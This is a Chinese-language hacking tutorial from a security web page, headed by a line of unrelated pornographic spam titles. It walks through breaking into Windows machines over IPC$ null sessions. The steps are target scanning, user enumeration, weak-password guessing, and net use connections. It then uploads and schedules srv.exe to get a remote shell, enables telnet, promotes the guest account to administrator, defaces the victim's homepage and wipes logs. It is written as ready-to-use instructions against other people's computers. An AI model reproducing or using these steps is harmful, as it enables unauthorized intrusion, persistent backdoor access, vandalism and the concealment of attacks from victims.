国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動安全 安全管理 應用案例網(wǎng)絡威脅 系統(tǒng)安全 應用安全 數(shù)據(jù)安全 云安全

怎樣入侵能建立IPC$空連接的主機

時間:2011-05-03 15:15來源: 點擊:
IPC$的定義:IPC$是共享“命名管道”的資源,它對于程序間的通訊很重要。在遠程管理計算機和查看計算機的共享資源時使用。
Tags入侵(60)IPC$(7)空連接(7)  

  IPC$的定義:IPC$是共享“命名管道”的資源,它對于程序間的通訊很重要。在遠程管理計算機和查看計算機的共享資源時使用。

  IPC$的作用:利用IPC$我們可以與目標主機建立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得到目標主機上的用戶列表。用“流光”的IPC$探測功能,就可以得到用戶列表了,并可以配合字典,進行密碼嘗試。

  1:首先要掃到能建立IPC$空銜接的主機,要有目標才能進攻嘛我推薦安全焦點的xscan_gui v1.3使用方法很簡單,而且速度快,也許還能掃出其他漏洞,條條大路通北京嘛安全焦點的漏洞資料庫可是非常的全哦!!!(xscan_gui v1.3是個很不錯的網(wǎng)絡漏洞掃描器,想更好的利用請參閱軟件使用說明)

  2:這步要使用NET命令,如果你不懂的話建議你快學,NET可是非常強大的命令!(本人正在苦練中)如果你不懂的話就跟著我做吧。

  3:如果知道了對方的用戶名和密碼就用下面這個命令:

  net use [url=file://127.0.0.1/ipc$]127.0.0.1ipc$[/url] "密碼" /user:"用戶名"

  退出的命令是:

  net use [url=file://127.0.0.1/ipc$]127.0.0.1ipc$[/url] /delte

  相信能知道對方用戶名和密碼的情況不多,詳細說明就不寫了,寫出進入和退出命令僅供大家拿朋友的機子做做試驗,熟悉一下界面

  4:大部分情況下我們都不知道對方機子的用戶名和密碼。查他IP用ping命令,格式為:ping(空格)www.XXX.com(如果用QQ聊天更簡單,現(xiàn)在有QQ顯IP補丁,IP一目了然), 用追捕查他的,用戶名等?,F(xiàn)在信息都有了,然后大家試試弱智點的密碼,如:123,12345,123456,用戶名。運氣好的話就可以進入了:)你懶得作字典的話我還有一篇《弱智密碼集DIC》,可以去看看:)

  5:實在猜不出密碼的話我們只有祭上榕哥的大作--流光!運行 探測--掃描//NT/SQL主機,會出現(xiàn)“主機掃描設置”;在“掃描范圍”中分別填寫“開始地址”與“結(jié)束地址”,這步你可以選擇要掃描的IP段,也可以只填某一IP,掃描主機類型”選擇“NT/98”,然后開始掃描,有了NT/98的機器了,(如果單掃某一IP,我建議掃描主機類型選ALL,選項選中的內(nèi)容不要取消)可以看看他的機子是什么顏色的,具體表示看下表:

  紅色:該主機安裝了FrontPage擴展。并沒有權限設置。如果掃到紅色的,你可以打開FrontPage,在打開那里填上他的IP地址,接著你就知道怎么做了:)

  藍色:表示該主機上安裝了FrontPage擴展

  黑色:遠程執(zhí)行命令。你可以單擊該主機---連接,就可以用DOS命令操作遠程計算機,如:dir c:

  黃色:直接下載對方SAM文件(SAM文件是NT下儲存用戶和密碼的文件,下載后來后用LC3可以解開)

  綠色:將對方SAM文件上傳到指定的FTP服務器

  6:現(xiàn)在知道了他主機的情況,可以開始探測他的用戶列表了!右鍵點擊IPC$主機-探測-探測所有IPC$用戶列表,下面兩個框的設置都選上,我們只要IPC$管理員的弱口令。在結(jié)果點擊右鍵,探測用戶列表,Administrstor(超級用戶)直接探測到ADMIN的密碼,如果實在不行,我們還可以拿其他用戶“開刀”,然后在想辦法讓他變成超級用戶。

  7:得到用戶名和密碼我們就可以連接了。打開win2000下的cmd.exe(也就是命令提示符)。然后重復第二步教過的連接連接命令:

  net use [url=file://127.0.0.1/ipc$]127.0.0.1ipc$[/url] "密碼" /user:"用戶名"

  成功連接后顯示命令成功完成。這樣的話那臺機子就成了“你的親戚了”:

  8:現(xiàn)在你可以用copy命令把你想要上傳的東西放到他的機子了:

  9:如果你想黑他頁面的話找到他的網(wǎng)頁所在的目錄,如:c:inetpubwwwroot ,用命令:

  copy c:index.htm [url=file://IP/]IP[/url]地址c$inetpubwwwroot

  這里的c:index.htm指的是你作好的網(wǎng)頁,上傳替換掉原先的文件就可以改他的主頁。

  10:以上教的就是教你如何改別人主頁。如想要進一步控制對方的主機還需很多步驟,我手累了,你還想學的話看我第二篇教程吧:)

  11:大家到了這步一定要記得擦PP(記錄你信息的記錄),我推薦小搈的CleanIISLog,簡單易用,在對方機子運行一下就行了:)什么?你連怎么運行程序的命令都不懂?不懂FTP,NET命令還可以原諒,你這樣簡直是不可原諒!建議你看看關于DOS指令的書吧,DOS雖比不上windows易用,但對于很有用的!!!

  相關命令

  建立空連接

  net use [url=file://IP/ipc$]IPipc$[/url] "" /user:"" (一定要注意:這一行命令中包含了3個空格)

  建立非空連接

  net use [url=file://IP/ipc$]IPipc$[/url] "用戶名" /user:"密碼" (同樣有3個空格)

  映射默認共享

  net use z: [url=file://IP/c$]IPc$[/url] "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)

  如果已經(jīng)和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: [url=file://IP/c$]IPc$[/url]

  刪除一個ipc$連接

  net use [url=file://IP/ipc$]IPipc$[/url] /del

  刪除共享映射

  net use c: /del 刪除映射的c盤,其他盤類推

  net use * /del 刪除全部,會有提示要求按y確認

  經(jīng)典入侵模式

  1.C:>net use [url=file://127.0.0.1/IPC$]127.0.0.1IPC$[/url] "" /user:"admintitrators"

  這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。

  2. C:>copy srv.exe [url=file://127.0.0.1/admin$]127.0.0.1admin$[/url]

  先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:winntsystem32,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。

  3.C:>net time [url=file://127.0.0.1/]127.0.0.1[/url]

  查查時間,發(fā)現(xiàn)127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。

  4.C:>at [url=file://127.0.0.1/]127.0.0.1[/url] 11:05 srv.exe

  用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)

  5.C:>net time [url=file://127.0.0.1/]127.0.0.1[/url]

  再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。

  6.C:>telnet 127.0.0.1 99

  這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

  雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了

  7.C:>copy ntlm.exe [url=file://127.0.0.1/admin$]127.0.0.1admin$[/url]

  用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

  8.C:WINNTsystem32>ntlm

  輸入ntlm啟動(這里的C:WINNTsystem32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現(xiàn)"DONE"的時候,就說明已經(jīng)啟動正常。然后使用"net start telnet"來開啟Telnet服務!

  9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)

  為了以防萬一,我們再把guest激活加到管理組

  10.C:>net user guest /active:yes

  將對方的Guest用戶激活

  11.C:>net user guest 1234

  將Guest的密碼改為1234,或者你要設定的密碼

  12.C:>net localgroup administrators guest /add

  將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)

  ipc$與空連接,139,445端口,默認共享的關系

------分隔線----------------------------

推薦內(nèi)容